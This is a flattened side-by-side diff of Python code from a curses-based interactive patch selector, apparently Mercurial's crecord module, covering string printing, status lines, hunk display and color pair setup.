1047 elif item.neverunfolded:
1044 elif item.neverunfolded:
1048 item.neverunfolded = False
1045 item.neverunfolded = False
1049
1046
1050 # also fold any foldable children of the parent/current item
1047 # also fold any foldable children of the parent/current item
1051 if isinstance(item, uiheader): # the original or 'new' item
1048 if isinstance(item, uiheader): # the original or 'new' item
1052 for child in item.allchildren():
1049 for child in item.allchildren():
1053 child.folded = not item.folded
1050 child.folded = not item.folded
1054
1051
1055 if isinstance(item, (uiheader, uihunk)):
1052 if isinstance(item, (uiheader, uihunk)):
1056 item.folded = not item.folded
1053 item.folded = not item.folded
1057
1054
1058 def alignstring(self, instr, window):
1055 def alignstring(self, instr, window):
1059 """
1056 """
1060 add whitespace to the end of a string in order to make it fill
1057 add whitespace to the end of a string in order to make it fill
1061 the screen in the x direction. the current cursor position is
1058 the screen in the x direction. the current cursor position is
1062 taken into account when making this calculation. the string can span
1059 taken into account when making this calculation. the string can span
1063 multiple lines.
1060 multiple lines.
1064 """
1061 """
1065 y, xstart = window.getyx()
1062 y, xstart = window.getyx()
1066 width = self.xscreensize
1063 width = self.xscreensize
1067 # turn tabs into spaces
1064 # turn tabs into spaces
1068 instr = instr.expandtabs(4)
1065 instr = instr.expandtabs(4)
1069 strwidth = encoding.colwidth(instr)
1066 strwidth = encoding.colwidth(instr)
1070 numspaces = width - ((strwidth + xstart) % width)
1067 numspaces = width - ((strwidth + xstart) % width)
1071 return instr + b" " * numspaces
1068 return instr + b" " * numspaces
1072
1069
1073 def printstring(
1070 def printstring(
1074 self,
1071 self,
1075 window,
1072 window,
1076 text,
1073 text,
1077 fgcolor=None,
1074 fgcolor=None,
1078 bgcolor=None,
1075 bgcolor=None,
1079 pair=None,
1076 pair=None,
1080 pairname=None,
1077 pairname=None,
1081 attrlist=None,
1078 attrlist=None,
1082 towin=True,
1079 towin=True,
1083 align=True,
1080 align=True,
1084 showwhtspc=False,
1081 showwhtspc=False,
1085 ):
1082 ):
1086 """
1083 """
1087 print the string, text, with the specified colors and attributes, to
1084 print the string, text, with the specified colors and attributes, to
1088 the specified curses window object.
1085 the specified curses window object.
1089
1086
1090 the foreground and background colors are of the form
1087 the foreground and background colors are of the form
1091 curses.color_xxxx, where xxxx is one of: [black, blue, cyan, green,
1088 curses.color_xxxx, where xxxx is one of: [black, blue, cyan, green,
1092 magenta, red, white, yellow]. if pairname is provided, a color
1089 magenta, red, white, yellow]. if pairname is provided, a color
1093 pair will be looked up in the self.colorpairnames dictionary.
1090 pair will be looked up in the self.colorpairnames dictionary.
1094
1091
1095 attrlist is a list containing text attributes in the form of
1092 attrlist is a list containing text attributes in the form of
1096 curses.a_xxxx, where xxxx can be: [bold, dim, normal, standout,
1093 curses.a_xxxx, where xxxx can be: [bold, dim, normal, standout,
1097 underline].
1094 underline].
1098
1095
1099 if align == True, whitespace is added to the printed string such that
1096 if align == True, whitespace is added to the printed string such that
1100 the string stretches to the right border of the window.
1097 the string stretches to the right border of the window.
1101
1098
1102 if showwhtspc == True, trailing whitespace of a string is highlighted.
1099 if showwhtspc == True, trailing whitespace of a string is highlighted.
1103 """
1100 """
1104 # preprocess the text, converting tabs to spaces
1101 # preprocess the text, converting tabs to spaces
1105 text = text.expandtabs(4)
1102 text = text.expandtabs(4)
1106 # strip \n, and convert control characters to ^[char] representation
1103 # strip \n, and convert control characters to ^[char] representation
1107 text = re.sub(
1104 text = re.sub(
1108 br'[\x00-\x08\x0a-\x1f]',
1105 br'[\x00-\x08\x0a-\x1f]',
1109 lambda m: b'^' + pycompat.sysbytes(chr(ord(m.group()) + 64)),
1106 lambda m: b'^' + pycompat.sysbytes(chr(ord(m.group()) + 64)),
1110 text.strip(b'\n'),
1107 text.strip(b'\n'),
1111 )
1108 )
1112
1109
1113 if pair is not None:
1110 if pair is not None:
1114 colorpair = pair
1111 colorpair = pair
1115 elif pairname is not None:
1112 elif pairname is not None:
1116 colorpair = self.colorpairnames[pairname]
1113 colorpair = self.colorpairnames[pairname]
1117 else:
1114 else:
1118 if fgcolor is None:
1115 if fgcolor is None:
1119 fgcolor = -1
1116 fgcolor = -1
1120 if bgcolor is None:
1117 if bgcolor is None:
1121 bgcolor = -1
1118 bgcolor = -1
1122 if (fgcolor, bgcolor) in self.colorpairs:
1119 if (fgcolor, bgcolor) in self.colorpairs:
1123 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1120 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1124 else:
1121 else:
1125 colorpair = self.getcolorpair(fgcolor, bgcolor)
1122 colorpair = self.getcolorpair(fgcolor, bgcolor)
1126 # add attributes if possible
1123 # add attributes if possible
1127 if attrlist is None:
1124 if attrlist is None:
1128 attrlist = []
1125 attrlist = []
1129 if colorpair < 256:
1126 if colorpair < 256:
1130 # then it is safe to apply all attributes
1127 # then it is safe to apply all attributes
1131 for textattr in attrlist:
1128 for textattr in attrlist:
1132 colorpair |= textattr
1129 colorpair |= textattr
1133 else:
1130 else:
1134 # just apply a select few (safe?) attributes
1131 # just apply a select few (safe?) attributes
1135 for textattr in (curses.A_UNDERLINE, curses.A_BOLD):
1132 for textattr in (curses.A_UNDERLINE, curses.A_BOLD):
1136 if textattr in attrlist:
1133 if textattr in attrlist:
1137 colorpair |= textattr
1134 colorpair |= textattr
1138
1135
1139 y, xstart = self.chunkpad.getyx()
1136 y, xstart = self.chunkpad.getyx()
1140 t = b"" # variable for counting lines printed
1137 t = b"" # variable for counting lines printed
1141 # if requested, show trailing whitespace
1138 # if requested, show trailing whitespace
1142 if showwhtspc:
1139 if showwhtspc:
1143 origlen = len(text)
1140 origlen = len(text)
1144 text = text.rstrip(b' \n') # tabs have already been expanded
1141 text = text.rstrip(b' \n') # tabs have already been expanded
1145 strippedlen = len(text)
1142 strippedlen = len(text)
1146 numtrailingspaces = origlen - strippedlen
1143 numtrailingspaces = origlen - strippedlen
1147
1144
1148 if towin:
1145 if towin:
1149 window.addstr(text, colorpair)
1146 window.addstr(text, colorpair)
1150 t += text
1147 t += text
1151
1148
1152 if showwhtspc:
1149 if showwhtspc:
1153 wscolorpair = colorpair | curses.A_REVERSE
1150 wscolorpair = colorpair | curses.A_REVERSE
1154 if towin:
1151 if towin:
1155 for i in range(numtrailingspaces):
1152 for i in range(numtrailingspaces):
1156 window.addch(curses.ACS_CKBOARD, wscolorpair)
1153 window.addch(curses.ACS_CKBOARD, wscolorpair)
1157 t += b" " * numtrailingspaces
1154 t += b" " * numtrailingspaces
1158
1155
1159 if align:
1156 if align:
1160 if towin:
1157 if towin:
1161 extrawhitespace = self.alignstring(b"", window)
1158 extrawhitespace = self.alignstring(b"", window)
1162 window.addstr(extrawhitespace, colorpair)
1159 window.addstr(extrawhitespace, colorpair)
1163 else:
1160 else:
1164 # need to use t, since the x position hasn't incremented
1161 # need to use t, since the x position hasn't incremented
1165 extrawhitespace = self.alignstring(t, window)
1162 extrawhitespace = self.alignstring(t, window)
1166 t += extrawhitespace
1163 t += extrawhitespace
1167
1164
1168 # is reset to 0 at the beginning of printitem()
1165 # is reset to 0 at the beginning of printitem()
1169
1166
1170 linesprinted = (xstart + len(t)) // self.xscreensize
1167 linesprinted = (xstart + len(t)) // self.xscreensize
1171 self.linesprintedtopadsofar += linesprinted
1168 self.linesprintedtopadsofar += linesprinted
1172 return t
1169 return t
1173
1170
1174 def _getstatuslinesegments(self):
1171 def _getstatuslinesegments(self):
1175 """-> [str]. return segments"""
1172 """-> [str]. return segments"""
1176 selected = self.currentselecteditem.applied
1173 selected = self.currentselecteditem.applied
1177 spaceselect = _(b'space/enter: select')
1174 spaceselect = _(b'space/enter: select')
1178 spacedeselect = _(b'space/enter: deselect')
1175 spacedeselect = _(b'space/enter: deselect')
1179 # Format the selected label into a place as long as the longer of the
1176 # Format the selected label into a place as long as the longer of the
1180 # two possible labels. This may vary by language.
1177 # two possible labels. This may vary by language.
1181 spacelen = max(len(spaceselect), len(spacedeselect))
1178 spacelen = max(len(spaceselect), len(spacedeselect))
1182 selectedlabel = b'%-*s' % (
1179 selectedlabel = b'%-*s' % (
1183 spacelen,
1180 spacelen,
1184 spacedeselect if selected else spaceselect,
1181 spacedeselect if selected else spaceselect,
1185 )
1182 )
1186 segments = [
1183 segments = [
1187 _headermessages[self.operation],
1184 _headermessages[self.operation],
1188 b'-',
1185 b'-',
1189 _(b'[x]=selected **=collapsed'),
1186 _(b'[x]=selected **=collapsed'),
1190 _(b'c: confirm'),
1187 _(b'c: confirm'),
1191 _(b'q: abort'),
1188 _(b'q: abort'),
1192 _(b'arrow keys: move/expand/collapse'),
1189 _(b'arrow keys: move/expand/collapse'),
1193 selectedlabel,
1190 selectedlabel,
1194 _(b'?: help'),
1191 _(b'?: help'),
1195 ]
1192 ]
1196 return segments
1193 return segments
1197
1194
1198 def _getstatuslines(self):
1195 def _getstatuslines(self):
1199 """() -> [str]. return short help used in the top status window"""
1196 """() -> [str]. return short help used in the top status window"""
1200 if self.errorstr is not None:
1197 if self.errorstr is not None:
1201 lines = [self.errorstr, _(b'Press any key to continue')]
1198 lines = [self.errorstr, _(b'Press any key to continue')]
1202 else:
1199 else:
1203 # wrap segments to lines
1200 # wrap segments to lines
1204 segments = self._getstatuslinesegments()
1201 segments = self._getstatuslinesegments()
1205 width = self.xscreensize
1202 width = self.xscreensize
1206 lines = []
1203 lines = []
1207 lastwidth = width
1204 lastwidth = width
1208 for s in segments:
1205 for s in segments:
1209 w = encoding.colwidth(s)
1206 w = encoding.colwidth(s)
1210 sep = b' ' * (1 + (s and s[0] not in b'-['))
1207 sep = b' ' * (1 + (s and s[0] not in b'-['))
1211 if lastwidth + w + len(sep) >= width:
1208 if lastwidth + w + len(sep) >= width:
1212 lines.append(s)
1209 lines.append(s)
1213 lastwidth = w
1210 lastwidth = w
1214 else:
1211 else:
1215 lines[-1] += sep + s
1212 lines[-1] += sep + s
1216 lastwidth += w + len(sep)
1213 lastwidth += w + len(sep)
1217 if len(lines) != self.numstatuslines:
1214 if len(lines) != self.numstatuslines:
1218 self.numstatuslines = len(lines)
1215 self.numstatuslines = len(lines)
1219 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1216 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1220 return [stringutil.ellipsis(l, self.xscreensize - 1) for l in lines]
1217 return [stringutil.ellipsis(l, self.xscreensize - 1) for l in lines]
1221
1218
1222 def updatescreen(self):
1219 def updatescreen(self):
1223 self.statuswin.erase()
1220 self.statuswin.erase()
1224 self.chunkpad.erase()
1221 self.chunkpad.erase()
1225
1222
1226 printstring = self.printstring
1223 printstring = self.printstring
1227
1224
1228 # print out the status lines at the top
1225 # print out the status lines at the top
1229 try:
1226 try:
1230 for line in self._getstatuslines():
1227 for line in self._getstatuslines():
1231 printstring(self.statuswin, line, pairname=b"legend")
1228 printstring(self.statuswin, line, pairname=b"legend")
1232 self.statuswin.refresh()
1229 self.statuswin.refresh()
1233 except curses.error:
1230 except curses.error:
1234 pass
1231 pass
1235 if self.errorstr is not None:
1232 if self.errorstr is not None:
1236 return
1233 return
1237
1234
1238 # print out the patch in the remaining part of the window
1235 # print out the patch in the remaining part of the window
1239 try:
1236 try:
1240 self.printitem()
1237 self.printitem()
1241 self.updatescroll()
1238 self.updatescroll()
1242 self.chunkpad.refresh(
1239 self.chunkpad.refresh(
1243 self.firstlineofpadtoprint,
1240 self.firstlineofpadtoprint,
1244 0,
1241 0,
1245 self.numstatuslines,
1242 self.numstatuslines,
1246 0,
1243 0,
1247 self.yscreensize - self.numstatuslines,
1244 self.yscreensize - self.numstatuslines,
1248 self.xscreensize,
1245 self.xscreensize,
1249 )
1246 )
1250 except curses.error:
1247 except curses.error:
1251 pass
1248 pass
1252
1249
1253 def getstatusprefixstring(self, item):
1250 def getstatusprefixstring(self, item):
1254 """
1251 """
1255 create a string to prefix a line with which indicates whether 'item'
1252 create a string to prefix a line with which indicates whether 'item'
1256 is applied and/or folded.
1253 is applied and/or folded.
1257 """
1254 """
1258
1255
1259 # create checkbox string
1256 # create checkbox string
1260 if item.applied:
1257 if item.applied:
1261 if not isinstance(item, uihunkline) and item.partial:
1258 if not isinstance(item, uihunkline) and item.partial:
1262 checkbox = b"[~]"
1259 checkbox = b"[~]"
1263 else:
1260 else:
1264 checkbox = b"[x]"
1261 checkbox = b"[x]"
1265 else:
1262 else:
1266 checkbox = b"[ ]"
1263 checkbox = b"[ ]"
1267
1264
1268 try:
1265 try:
1269 if item.folded:
1266 if item.folded:
1270 checkbox += b"**"
1267 checkbox += b"**"
1271 if isinstance(item, uiheader):
1268 if isinstance(item, uiheader):
1272 # one of "m", "a", or "d" (modified, added, deleted)
1269 # one of "m", "a", or "d" (modified, added, deleted)
1273 filestatus = item.changetype
1270 filestatus = item.changetype
1274
1271
1275 checkbox += filestatus + b" "
1272 checkbox += filestatus + b" "
1276 else:
1273 else:
1277 checkbox += b" "
1274 checkbox += b" "
1278 if isinstance(item, uiheader):
1275 if isinstance(item, uiheader):
1279 # add two more spaces for headers
1276 # add two more spaces for headers
1280 checkbox += b" "
1277 checkbox += b" "
1281 except AttributeError: # not foldable
1278 except AttributeError: # not foldable
1282 checkbox += b" "
1279 checkbox += b" "
1283
1280
1284 return checkbox
1281 return checkbox
1285
1282
1286 def printheader(
1283 def printheader(
1287 self, header, selected=False, towin=True, ignorefolding=False
1284 self, header, selected=False, towin=True, ignorefolding=False
1288 ):
1285 ):
1289 """
1286 """
1290 print the header to the pad. if countlines is True, don't print
1287 print the header to the pad. if countlines is True, don't print
1291 anything, but just count the number of lines which would be printed.
1288 anything, but just count the number of lines which would be printed.
1292 """
1289 """
1293
1290
1294 outstr = b""
1291 outstr = b""
1295 text = header.prettystr()
1292 text = header.prettystr()
1296 chunkindex = self.chunklist.index(header)
1293 chunkindex = self.chunklist.index(header)
1297
1294
1298 if chunkindex != 0 and not header.folded:
1295 if chunkindex != 0 and not header.folded:
1299 # add separating line before headers
1296 # add separating line before headers
1300 outstr += self.printstring(
1297 outstr += self.printstring(
1301 self.chunkpad, b'_' * self.xscreensize, towin=towin, align=False
1298 self.chunkpad, b'_' * self.xscreensize, towin=towin, align=False
1302 )
1299 )
1303 # select color-pair based on if the header is selected
1300 # select color-pair based on if the header is selected
1304 colorpair = self.getcolorpair(
1301 colorpair = self.getcolorpair(
1305 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1302 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1306 )
1303 )
1307
1304
1308 # print out each line of the chunk, expanding it to screen width
1305 # print out each line of the chunk, expanding it to screen width
1309
1306
1310 # number of characters to indent lines on this level by
1307 # number of characters to indent lines on this level by
1311 indentnumchars = 0
1308 indentnumchars = 0
1312 checkbox = self.getstatusprefixstring(header)
1309 checkbox = self.getstatusprefixstring(header)
1313 if not header.folded or ignorefolding:
1310 if not header.folded or ignorefolding:
1314 textlist = text.split(b"\n")
1311 textlist = text.split(b"\n")
1315 linestr = checkbox + textlist[0]
1312 linestr = checkbox + textlist[0]
1316 else:
1313 else:
1317 linestr = checkbox + header.filename()
1314 linestr = checkbox + header.filename()
1318 outstr += self.printstring(
1315 outstr += self.printstring(
1319 self.chunkpad, linestr, pair=colorpair, towin=towin
1316 self.chunkpad, linestr, pair=colorpair, towin=towin
1320 )
1317 )
1321 if not header.folded or ignorefolding:
1318 if not header.folded or ignorefolding:
1322 if len(textlist) > 1:
1319 if len(textlist) > 1:
1323 for line in textlist[1:]:
1320 for line in textlist[1:]:
1324 linestr = b" " * (indentnumchars + len(checkbox)) + line
1321 linestr = b" " * (indentnumchars + len(checkbox)) + line
1325 outstr += self.printstring(
1322 outstr += self.printstring(
1326 self.chunkpad, linestr, pair=colorpair, towin=towin
1323 self.chunkpad, linestr, pair=colorpair, towin=towin
1327 )
1324 )
1328
1325
1329 return outstr
1326 return outstr
1330
1327
1331 def printhunklinesbefore(
1328 def printhunklinesbefore(
1332 self, hunk, selected=False, towin=True, ignorefolding=False
1329 self, hunk, selected=False, towin=True, ignorefolding=False
1333 ):
1330 ):
1334 """includes start/end line indicator"""
1331 """includes start/end line indicator"""
1335 outstr = b""
1332 outstr = b""
1336 # where hunk is in list of siblings
1333 # where hunk is in list of siblings
1337 hunkindex = hunk.header.hunks.index(hunk)
1334 hunkindex = hunk.header.hunks.index(hunk)
1338
1335
1339 if hunkindex != 0:
1336 if hunkindex != 0:
1340 # add separating line before headers
1337 # add separating line before headers
1341 outstr += self.printstring(
1338 outstr += self.printstring(
1342 self.chunkpad, b' ' * self.xscreensize, towin=towin, align=False
1339 self.chunkpad, b' ' * self.xscreensize, towin=towin, align=False
1343 )
1340 )
1344
1341
1345 colorpair = self.getcolorpair(
1342 colorpair = self.getcolorpair(
1346 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1343 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1347 )
1344 )
1348
1345
1349 # print out from-to line with checkbox
1346 # print out from-to line with checkbox
1350 checkbox = self.getstatusprefixstring(hunk)
1347 checkbox = self.getstatusprefixstring(hunk)
1351
1348
1352 lineprefix = b" " * self.hunkindentnumchars + checkbox
1349 lineprefix = b" " * self.hunkindentnumchars + checkbox
1353 frtoline = b" " + hunk.getfromtoline().strip(b"\n")
1350 frtoline = b" " + hunk.getfromtoline().strip(b"\n")
1354
1351
1355 outstr += self.printstring(
1352 outstr += self.printstring(
1356 self.chunkpad, lineprefix, towin=towin, align=False
1353 self.chunkpad, lineprefix, towin=towin, align=False
1357 ) # add uncolored checkbox/indent
1354 ) # add uncolored checkbox/indent
1358 outstr += self.printstring(
1355 outstr += self.printstring(
1359 self.chunkpad, frtoline, pair=colorpair, towin=towin
1356 self.chunkpad, frtoline, pair=colorpair, towin=towin
1360 )
1357 )
1361
1358
1362 if hunk.folded and not ignorefolding:
1359 if hunk.folded and not ignorefolding:
1363 # skip remainder of output
1360 # skip remainder of output
1364 return outstr
1361 return outstr
1365
1362
1366 # print out lines of the chunk preceeding changed-lines
1363 # print out lines of the chunk preceeding changed-lines
1367 for line in hunk.before:
1364 for line in hunk.before:
1368 linestr = (
1365 linestr = (
1369 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1366 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1370 )
1367 )
1371 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1368 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1372
1369
1373 return outstr
1370 return outstr
1374
1371
1375 def printhunklinesafter(self, hunk, towin=True, ignorefolding=False):
1372 def printhunklinesafter(self, hunk, towin=True, ignorefolding=False):
1376 outstr = b""
1373 outstr = b""
1377 if hunk.folded and not ignorefolding:
1374 if hunk.folded and not ignorefolding:
1378 return outstr
1375 return outstr
1379
1376
1380 # a bit superfluous, but to avoid hard-coding indent amount
1377 # a bit superfluous, but to avoid hard-coding indent amount
1381 checkbox = self.getstatusprefixstring(hunk)
1378 checkbox = self.getstatusprefixstring(hunk)
1382 for line in hunk.after:
1379 for line in hunk.after:
1383 linestr = (
1380 linestr = (
1384 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1381 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1385 )
1382 )
1386 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1383 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1387
1384
1388 return outstr
1385 return outstr
1389
1386
1390 def printhunkchangedline(self, hunkline, selected=False, towin=True):
1387 def printhunkchangedline(self, hunkline, selected=False, towin=True):
1391 outstr = b""
1388 outstr = b""
1392 checkbox = self.getstatusprefixstring(hunkline)
1389 checkbox = self.getstatusprefixstring(hunkline)
1393
1390
1394 linestr = hunkline.prettystr().strip(b"\n")
1391 linestr = hunkline.prettystr().strip(b"\n")
1395
1392
1396 # select color-pair based on whether line is an addition/removal
1393 # select color-pair based on whether line is an addition/removal
1397 if selected:
1394 if selected:
1398 colorpair = self.getcolorpair(name=b"selected")
1395 colorpair = self.getcolorpair(name=b"selected")
1399 elif linestr.startswith(b"+"):
1396 elif linestr.startswith(b"+"):
1400 colorpair = self.getcolorpair(name=b"addition")
1397 colorpair = self.getcolorpair(name=b"addition")
1401 elif linestr.startswith(b"-"):
1398 elif linestr.startswith(b"-"):
1402 colorpair = self.getcolorpair(name=b"deletion")
1399 colorpair = self.getcolorpair(name=b"deletion")
1403 elif linestr.startswith(b"\\"):
1400 elif linestr.startswith(b"\\"):
1404 colorpair = self.getcolorpair(name=b"normal")
1401 colorpair = self.getcolorpair(name=b"normal")
1405
1402
1406 lineprefix = b" " * self.hunklineindentnumchars + checkbox
1403 lineprefix = b" " * self.hunklineindentnumchars + checkbox
1407 outstr += self.printstring(
1404 outstr += self.printstring(
1408 self.chunkpad, lineprefix, towin=towin, align=False
1405 self.chunkpad, lineprefix, towin=towin, align=False
1409 ) # add uncolored checkbox/indent
1406 ) # add uncolored checkbox/indent
1410 outstr += self.printstring(
1407 outstr += self.printstring(
1411 self.chunkpad, linestr, pair=colorpair, towin=towin, showwhtspc=True
1408 self.chunkpad, linestr, pair=colorpair, towin=towin, showwhtspc=True
1412 )
1409 )
1413 return outstr
1410 return outstr
1414
1411
1415 def printitem(
1412 def printitem(
1416 self, item=None, ignorefolding=False, recursechildren=True, towin=True
1413 self, item=None, ignorefolding=False, recursechildren=True, towin=True
1417 ):
1414 ):
1418 """
1415 """
1419 use __printitem() to print the the specified item.applied.
1416 use __printitem() to print the the specified item.applied.
1420 if item is not specified, then print the entire patch.
1417 if item is not specified, then print the entire patch.
1421 (hiding folded elements, etc. -- see __printitem() docstring)
1418 (hiding folded elements, etc. -- see __printitem() docstring)
1422 """
1419 """
1423
1420
1424 if item is None:
1421 if item is None:
1425 item = self.headerlist
1422 item = self.headerlist
1426 if recursechildren:
1423 if recursechildren:
1427 self.linesprintedtopadsofar = 0
1424 self.linesprintedtopadsofar = 0
1428
1425
1429 outstr = []
1426 outstr = []
1430 self.__printitem(
1427 self.__printitem(
1431 item, ignorefolding, recursechildren, outstr, towin=towin
1428 item, ignorefolding, recursechildren, outstr, towin=towin
1432 )
1429 )
1433 return b''.join(outstr)
1430 return b''.join(outstr)
1434
1431
1435 def outofdisplayedarea(self):
1432 def outofdisplayedarea(self):
1436 y, _ = self.chunkpad.getyx() # cursor location
1433 y, _ = self.chunkpad.getyx() # cursor location
1437 # * 2 here works but an optimization would be the max number of
1434 # * 2 here works but an optimization would be the max number of
1438 # consecutive non selectable lines
1435 # consecutive non selectable lines
1439 # i.e the max number of context line for any hunk in the patch
1436 # i.e the max number of context line for any hunk in the patch
1440 miny = min(0, self.firstlineofpadtoprint - self.yscreensize)
1437 miny = min(0, self.firstlineofpadtoprint - self.yscreensize)
1441 maxy = self.firstlineofpadtoprint + self.yscreensize * 2
1438 maxy = self.firstlineofpadtoprint + self.yscreensize * 2
1442 return y < miny or y > maxy
1439 return y < miny or y > maxy
1443
1440
1444 def handleselection(self, item, recursechildren):
1441 def handleselection(self, item, recursechildren):
1445 selected = item is self.currentselecteditem
1442 selected = item is self.currentselecteditem
1446 if selected and recursechildren:
1443 if selected and recursechildren:
1447 # assumes line numbering starting from line 0
1444 # assumes line numbering starting from line 0
1448 self.selecteditemstartline = self.linesprintedtopadsofar
1445 self.selecteditemstartline = self.linesprintedtopadsofar
1449 selecteditemlines = self.getnumlinesdisplayed(
1446 selecteditemlines = self.getnumlinesdisplayed(
1450 item, recursechildren=False
1447 item, recursechildren=False
1451 )
1448 )
1452 self.selecteditemendline = (
1449 self.selecteditemendline = (
1453 self.selecteditemstartline + selecteditemlines - 1
1450 self.selecteditemstartline + selecteditemlines - 1
1454 )
1451 )
1455 return selected
1452 return selected
1456
1453
1457 def __printitem(
1454 def __printitem(
1458 self, item, ignorefolding, recursechildren, outstr, towin=True
1455 self, item, ignorefolding, recursechildren, outstr, towin=True
1459 ):
1456 ):
1460 """
1457 """
1461 recursive method for printing out patch/header/hunk/hunk-line data to
1458 recursive method for printing out patch/header/hunk/hunk-line data to
1462 screen. also returns a string with all of the content of the displayed
1459 screen. also returns a string with all of the content of the displayed
1463 patch (not including coloring, etc.).
1460 patch (not including coloring, etc.).
1464
1461
1465 if ignorefolding is True, then folded items are printed out.
1462 if ignorefolding is True, then folded items are printed out.
1466
1463
1467 if recursechildren is False, then only print the item without its
1464 if recursechildren is False, then only print the item without its
1468 child items.
1465 child items.
1469 """
1466 """
1470
1467
1471 if towin and self.outofdisplayedarea():
1468 if towin and self.outofdisplayedarea():
1472 return
1469 return
1473
1470
1474 selected = self.handleselection(item, recursechildren)
1471 selected = self.handleselection(item, recursechildren)
1475
1472
1476 # patch object is a list of headers
1473 # patch object is a list of headers
1477 if isinstance(item, patch):
1474 if isinstance(item, patch):
1478 if recursechildren:
1475 if recursechildren:
1479 for hdr in item:
1476 for hdr in item:
1480 self.__printitem(
1477 self.__printitem(
1481 hdr, ignorefolding, recursechildren, outstr, towin
1478 hdr, ignorefolding, recursechildren, outstr, towin
1482 )
1479 )
1483 # todo: eliminate all isinstance() calls
1480 # todo: eliminate all isinstance() calls
1484 if isinstance(item, uiheader):
1481 if isinstance(item, uiheader):
1485 outstr.append(
1482 outstr.append(
1486 self.printheader(
1483 self.printheader(
1487 item, selected, towin=towin, ignorefolding=ignorefolding
1484 item, selected, towin=towin, ignorefolding=ignorefolding
1488 )
1485 )
1489 )
1486 )
1490 if recursechildren:
1487 if recursechildren:
1491 for hnk in item.hunks:
1488 for hnk in item.hunks:
1492 self.__printitem(
1489 self.__printitem(
1493 hnk, ignorefolding, recursechildren, outstr, towin
1490 hnk, ignorefolding, recursechildren, outstr, towin
1494 )
1491 )
1495 elif isinstance(item, uihunk) and (
1492 elif isinstance(item, uihunk) and (
1496 (not item.header.folded) or ignorefolding
1493 (not item.header.folded) or ignorefolding
1497 ):
1494 ):
1498 # print the hunk data which comes before the changed-lines
1495 # print the hunk data which comes before the changed-lines
1499 outstr.append(
1496 outstr.append(
1500 self.printhunklinesbefore(
1497 self.printhunklinesbefore(
1501 item, selected, towin=towin, ignorefolding=ignorefolding
1498 item, selected, towin=towin, ignorefolding=ignorefolding
1502 )
1499 )
1503 )
1500 )
1504 if recursechildren:
1501 if recursechildren:
1505 for l in item.changedlines:
1502 for l in item.changedlines:
1506 self.__printitem(
1503 self.__printitem(
1507 l, ignorefolding, recursechildren, outstr, towin
1504 l, ignorefolding, recursechildren, outstr, towin
1508 )
1505 )
1509 outstr.append(
1506 outstr.append(
1510 self.printhunklinesafter(
1507 self.printhunklinesafter(
1511 item, towin=towin, ignorefolding=ignorefolding
1508 item, towin=towin, ignorefolding=ignorefolding
1512 )
1509 )
1513 )
1510 )
1514 elif isinstance(item, uihunkline) and (
1511 elif isinstance(item, uihunkline) and (
1515 (not item.hunk.folded) or ignorefolding
1512 (not item.hunk.folded) or ignorefolding
1516 ):
1513 ):
1517 outstr.append(
1514 outstr.append(
1518 self.printhunkchangedline(item, selected, towin=towin)
1515 self.printhunkchangedline(item, selected, towin=towin)
1519 )
1516 )
1520
1517
1521 return outstr
1518 return outstr
1522
1519
1523 def getnumlinesdisplayed(
1520 def getnumlinesdisplayed(
1524 self, item=None, ignorefolding=False, recursechildren=True
1521 self, item=None, ignorefolding=False, recursechildren=True
1525 ):
1522 ):
1526 """
1523 """
1527 return the number of lines which would be displayed if the item were
1524 return the number of lines which would be displayed if the item were
1528 to be printed to the display. the item will not be printed to the
1525 to be printed to the display. the item will not be printed to the
1529 display (pad).
1526 display (pad).
1530 if no item is given, assume the entire patch.
1527 if no item is given, assume the entire patch.
1531 if ignorefolding is True, folded items will be unfolded when counting
1528 if ignorefolding is True, folded items will be unfolded when counting
1532 the number of lines.
1529 the number of lines.
1533 """
1530 """
1534
1531
1535 # temporarily disable printing to windows by printstring
1532 # temporarily disable printing to windows by printstring
1536 patchdisplaystring = self.printitem(
1533 patchdisplaystring = self.printitem(
1537 item, ignorefolding, recursechildren, towin=False
1534 item, ignorefolding, recursechildren, towin=False
1538 )
1535 )
1539 numlines = len(patchdisplaystring) // self.xscreensize
1536 numlines = len(patchdisplaystring) // self.xscreensize
1540 return numlines
1537 return numlines
1541
1538
1542 def sigwinchhandler(self, n, frame):
1539 def sigwinchhandler(self, n, frame):
1543 """handle window resizing"""
1540 """handle window resizing"""
1544 try:
1541 try:
1545 curses.endwin()
1542 curses.endwin()
1546 self.xscreensize, self.yscreensize = scmutil.termsize(self.ui)
1543 self.xscreensize, self.yscreensize = scmutil.termsize(self.ui)
1547 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1544 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1548 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1545 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1549 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1546 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1550 except curses.error:
1547 except curses.error:
1551 pass
1548 pass
1552
1549
1553 def getcolorpair(
1550 def getcolorpair(
1554 self, fgcolor=None, bgcolor=None, name=None, attrlist=None
1551 self, fgcolor=None, bgcolor=None, name=None, attrlist=None
1555 ):
1552 ):
1556 """
1553 """
1557 get a curses color pair, adding it to self.colorpairs if it is not
1554 get a curses color pair, adding it to self.colorpairs if it is not
1558 already defined. an optional string, name, can be passed as a shortcut
1555 already defined. an optional string, name, can be passed as a shortcut
1559 for referring to the color-pair. by default, if no arguments are
1556 for referring to the color-pair. by default, if no arguments are
1560 specified, the white foreground / black background color-pair is
1557 specified, the white foreground / black background color-pair is
1561 returned.
1558 returned.
1562
1559
1563 it is expected that this function will be used exclusively for
1560 it is expected that this function will be used exclusively for
1564 initializing color pairs, and not curses.init_pair().
1561 initializing color pairs, and not curses.init_pair().
1565
1562
